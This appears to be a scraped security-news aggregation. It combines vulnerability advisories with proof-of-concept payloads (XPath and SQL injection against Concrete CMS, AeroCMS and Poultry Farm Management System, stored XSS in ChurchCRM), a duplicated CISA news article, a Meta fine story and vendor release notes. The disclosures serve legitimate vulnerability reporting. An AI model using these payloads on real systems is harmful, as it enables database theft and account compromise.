Insufficient policy enforcement in DevTools in Google Chrome on Windows prior to 108.0.5359.71 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2022-4187

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.

Successful exploitation of the remote command execution bug could enable an unauthenticated attacker with network access to completely compromise and take over Access Manager instances.

"It may give the attacker access to OAM server, to create any user with any privileges, or just get code execution in the victim's server," Vietnamese security researcher Nguyen Jang (Janggggg), who reported the bug alongside peterjson, noted earlier this March.

The issue was addressed by Oracle as part of its Critical Patch Update in January 2022.

Additional details regarding the nature of the attacks and the scale of the exploitation efforts are immediately unclear. Data gathered by threat intelligence firm GreyNoise shows that attempts to weaponize the flaw have been ongoing and originate from the U.S., China, Germany, Singapore, and Canada.

Also added by CISA to the KEV catalog is the recently patched heap buffer overflow flaw in the Google Chrome web browser (CVE-2022-4135) that the internet giant acknowledged as having been abused in the wild.

Federal agencies are required to apply the vendor patches by December 19, 2022, to secure their networks against potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Actively Exploited Critical Oracle Fusion Middleware Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.
<!-

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical flaw impacting Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2021-35587, carries a CVSS score of 9.8 and impacts Oracle Access Manager (OAM) versions 11.1.2.3.0, 12.2.1.3.0, and 12.2.1.4.0.

Successful exploitation of the remote command execution bug could enable an unauthenticated attacker with network access to completely compromise and take over Access Manager instances.

"It may give the attacker access to OAM server, to create any user with any privileges, or just get code execution in the victim's server," Vietnamese security researcher Nguyen Jang (Janggggg), who reported the bug alongside peterjson, noted earlier this March.

The issue was addressed by Oracle as part of its Critical Patch Update in January 2022.

Additional details regarding the nature of the attacks and the scale of the exploitation efforts are immediately unclear. Data gathered by threat intelligence firm GreyNoise shows that attempts to weaponize the flaw have been ongoing and originate from the U.S., China, Singapore, and Canada.

Also added by CISA to the KEV catalog is the recently patched heap buffer overflow flaw in the Google Chrome web browser (CVE-2022-4135) that the internet giant acknowledged as having been abused in the wild.

Federal agencies are required to apply the vendor patches by December 19, 2022, to secure networks against potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Affected Component:**

http://ip\_address:port/churchcrm/FindDepositSlip.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Deposit” as show in the picture and Click on the “View All Deposits” then click on the “Deposit Comment” enter the XSS payload and press the “Add New Deposit” button.

3\. After press the “Add New Deposit” button The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36136: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at Deposit Commend

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Affected Component:**

http://ip\_address:port/churchcrm/SystemSettings.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Admin” as show in the picture and Click on the “Edit General Settings”

3\. Next, Go to the “System Settings”. click on the “sHeader” input then enter the XSS payload and press the Save Settings button.

4\. After refresh this page The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36137: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at sHeader

By Habiba Rashid
The incident led to the publication of data on Irish police, sitting judges, prison officers, social workers, journalists, and others, leading to a spike in scam calls and texts in Ireland.
This is a post from HackRead.com Read the original post: Meta Fined €265 million in Facebook Data Scraping Case in the EU

Ireland’s Data Protection Commissioner (DPC) has placed yet another fine of €265 million ($277 million) on **Meta** following Facebook’s data scraping case. The penalty was levied at the social media app for being unable to prevent millions of phone numbers, email addresses, and other personal data from being ‘**scraped**’ and published onto the internet. This fine was concurred by other European data regulators.

A scraped database containing personal data of over 500 million Facebook users (Image: Hackread.com)

The failure to protect such data led to the publication of personal data of Irish police officers, sitting judges, prison officers, social workers, journalists, and others, leading to a spike in scam calls and texts in Ireland and **Europe**. 

This follows last year’s sanctioning of Whatsapp which resulted in a €225 million ($267 million) fine for Meta after they failed to adequately provide details of how they processed personal data. At the time, WhatsApp appealed the decision.

In March, Facebook was given another fine of €17 million ($18.6 million) by DPC for organization inadequacies followed by a record €405 million ($402 million at the time) penalty on Instagram **in September 2022** for not protecting the privacy of children’s accounts. 

According to Irish Independent’s **report**, the total amount of fines levied on Meta by Ireland’s regulator is at €912 million throughout the last 12 months. 

1.  **Facebook data of 500M+ users from 106 countries leaked online**
2.  **Facebook sues developer of data scraping extensions for Chrome**
3.  **Chinese firm leaked 200m Facebook, Instagram, LinkedIn users’ data**
4.  **Exclusive: Hacker selling 500M Facebook user data from 82 countries**
5.  **Facebook sues Ukrainian man for scraping and selling 178m users’ data**
6.  **Leaked database exposed login data of 100k hacked Facebook accounts**

In the Facebook data scraping case, 1.3 million Irish Facebook accounts were affected while hundreds of millions were affected globally. Facebook defended itself by blaming “bad actors” who had “scraped” Facebook’s website for personal details.

But Ireland’s DPC found such a defense unjustified since it was Facebook that had not designed its security system in a way to counter and stop such “scraping” from happening. 

Facebook, the DPC found, had failed **GDPR provisions** obliging the company to “implement appropriate technical and organizational measures”. It also found that Facebook failed **GDPR rules** that require it to implement “appropriate technical and organizational measures” which “ensure that, by default, personal data are not made accessible without the individual’s intervention”.

**What is Data Scraping?**

Data scraping or web scraping is the process of extracting data from websites. It can be done manually by a user, but it is more commonly done using automated tools. Automated data scraping tools can extract data from multiple web pages and store it in a format that can be used for further analysis.

Data scraping can be used to collect data about products, prices, reviews, and more. It can also be used to automatically fill out forms or to scrape the contact information from websites.

1.  **Hackers leak scraped data of 87,000 GETTR users**
2.  **Nearly 500 million WhatsApp User Records Sold Online**
3.  **Scraped data of 1.3 million Clubhouse users published online**
4.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube records**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Meta Fined €265 million in Facebook Data Scraping Case in the EU

This update resolves a multi-factor authentication bypass attack

This release includes the following software fixes:

Component

Description

Administration Portal

The data and graphs displayed on the Dashboard are not up to date. The data and graph are displayed until the date when the settings are last saved. However, the data gets updated when the administrator manually updates the .

Administration Portal

Specifying color in the RGB format or keeping the following fields empty in the policy results in an error message:

Therefore, you must set the colors in the Hexadecimal format.

Administration Portal

The column is removed from the widget of Dashboard, as it does not provide clear details about the expiry status of a specific license and causes confusion.

Administration Portal

The full synchronization process marks several active users for deletion. Due to this issue, active users cannot log in. This issue occurs after upgrading to Advanced Authentication 6.3 Service Pack 4 Patch 1 release.

Administration Portal

Use of special characters in the ClientID and Secret of OAuth events causes the Web Authentication parsing error.

Administration Portal

The customized brand settings break after upgrading to Advanced Authentication 6.4. This issue occurs due to the missing custom branding JAR file.

Administration Portal

Implementing the Per Tenant Hostname (PTH) feature breaks the Web Authentication method.

Administration Portal

The administrator is unable to remove the LDAP repository when the LDAP server is unavailable. The following error message is displayed:

Cannot connect to the LDAP server

Administration Portal

The existing OAuth integrations fail after the upgrade to Advanced Authentication 6.4.

Administration Portal

When the name and number of a particular Server Metric tile are too long, then the content that is extending outside the tile is wrapped that misaligns the tile position.

Administration Portal

On the Linux PAM Client, the is not formatted properly.

Appliance

Deleting the reports from the Administration Portal does not delete the exported reports (CSV and JSON) in the /var/lib/docker/volumes/aaf\_aucore-data/\_data/reports path even after rebooting the appliance.

Appliance

The upgrade of Web Servers to Advanced Authentication 6.4 fail in the cluster environment.

CAF Portal

The upgrade to Advanced Authentication 6.4 fails if the connection is via proxy.

CAF Portal

In Advanced Authentication 6.4, exporting of the Digital Certificate results in an error.

Enrollment Portal

After integrating Advanced Authentication with Access Manager using the SAML event, the redirection from Access Manager to the Enrollment Portal fails and results in a 404 error. This happens due to the missing text webauth/ in the Callback URL.

Enrollment Portal

The enrollment of the Web Authentication Method fails even when the administrator has configured the method with valid details.

Linux PAM Client

When a user selects an authentication chain with the Fingerprint method on the Linux PAM client, an error message Invalid access: cannot convert empty value is displayed.

Now, if the Fingerprint reader is not connected to the Linux machine and user attempts to log in, the authentication chain with the Fingerprint method is not displayed.

OAuth and SAML Events

The SAML Service Provider method with improper configuration bypasses authentication and grants access without any validation to the associated OAuth and SAML events.

Old Enrollment Portal

On the old Enrollment Portal, enrollment of the U2F method fails when using the Chrome browser.

SAML Event

When Advanced Authentication and Cisco AnyConnect are integrated using the SAML event, the login page is not displayed appropriately.

Web Authentication

With one Web Authentication event active for a user and the user tries to log in to another Web Authentication event, an error message stating to log out from the previous event is displayed.

Web Authentication

An authentication attempt to the Web Authentication event fails if the is set with RGB values in the policy. This occurs due to the use of transparent colors. Therefore, administrators must set the colors in the Hexadecimal format.

Windows Client

When users try to authenticate to Windows Client using the FIDO2 method with NFC capability, an invalid error message Please connect a FIDO2 token is displayed though the reader is connected to the system.

Windows Client

An invalid error message is displayed when a user removes the NFC-supported card from the card reader while authenticating to Windows Client using the Card method.

Now, the following message is displayed when the user removes NFC supported card from the reader during authentication:

Tap your security key again on the reader

CVE-2022-38753: Advanced Authentication 6.4 Service Pack 1 Release Notes

Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.

**Poultry Farm Management System v1.0 by Nikhil\_B has SQL injection**

BUG\_Author: TavenLi

vendors:https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Vulnerability File: /Redcock-Farm/farm/category.php

GET parameter 'del' exists SQL injection vulnerability

Payload1: /Redcock-Farm/farm/category.php?del=a'

    GET /Redcock-Farm/farm/category.php?del=a' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An error page

Payload2: /Redcock-Farm/farm/category.php?del=a''

    GET /Redcock-Farm/farm/category.php?del=a'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An right page

Payload3: /Redcock-Farm/farm/category.php?del=a'%2b(select\*from(select(sleep(20)))a)%2b'

    GET /Redcock-Farm/farm/category.php?del=a'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

The server response time is 20 seconds

Tag

#chrome